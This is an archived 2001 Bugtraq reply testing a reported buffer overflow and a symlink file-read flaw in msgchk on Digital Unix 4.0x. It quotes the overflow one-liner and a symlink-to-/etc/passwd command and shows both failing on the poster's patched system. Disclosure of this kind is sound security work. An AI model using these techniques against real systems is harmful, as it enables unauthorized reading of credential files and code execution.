Bugtraq mailing list archives
FW: Digital Unix 4.0x msgchk multiple vulnerabilities
From: "Boyce, Nick" <nick.boyce () eds com>
Date: Wed, 12 Sep 2001 10:54:41 +0100
[Resend: my original reply to Bugtraq on Monday 10th has not appeared, and I haven't seen any other followup; this time I've replaced all weird > ASCII 127 characters in my screen dumps by X's in case that prevented my email's handling by some MTA somewhere] On 10 September 2001 03:54, SeungHyun Seo said :
there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital unix 4.0x. it's a mail utility - check for messages (only available within
the
message handlin system, mh)
[...]
/usr/bin/mh/msgchk is affected to buffer overflow vulnerability -- snip -- $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'` AAAAAAAAAAAAA ... ... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA : msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ... AAAAAAAAAAAAAAAAAAAAAAA Memory fault(coredump) -- snip --
NOT confirmed. On my system (Digital Unix 4.0D, Patch Kit 5) this gives me : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... AAAAAAAAAAAAAA : msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA followed by another command prompt. And the exploit doesn't work : /usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std /usr/users/joesoap/bin>msgbreak I'm going to create the standard MH path for you. AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .... [lots of pairs of "G" followed by "y" with an upsilon accent] XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .... [even more A's] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX : msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX /usr/users/joesoap/bin>whoami joesoap /usr/users/joesoap/bin>uname -a OSF1 mybox V4.0 878 alpha (Lines wrapped for readability, and unprintable blobs replaced by X's.) Looks like there must have been a patch for this somewhere in Patch Kits 1 thru 5. Or maybe the hole only exists *prior* to 4.0D. Part 2:
Next , /usr/bin/mh/msgchk has a vulnerability that anyone read 1 line of the unprivileged file on the system it's a old bug on redhat linux
2.0,
but it also works on digital unix 4.0x
This hole doesn't work either : /usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile /usr/users/joesoap>/usr/bin/mh/msgchk joesoap : No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST /usr/users/joesoap>head -2 ./~mh_profile root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh nobody:*Nologin:65534:65534:anonymous NFS user:/: Nick Boyce EDS, Bristol, UK
Current thread:
- Digital Unix 4.0x msgchk multiple vulnerabilities SeungHyun Seo (Sep 10)
- <Possible follow-ups>
- FW: Digital Unix 4.0x msgchk multiple vulnerabilities Boyce, Nick (Sep 12)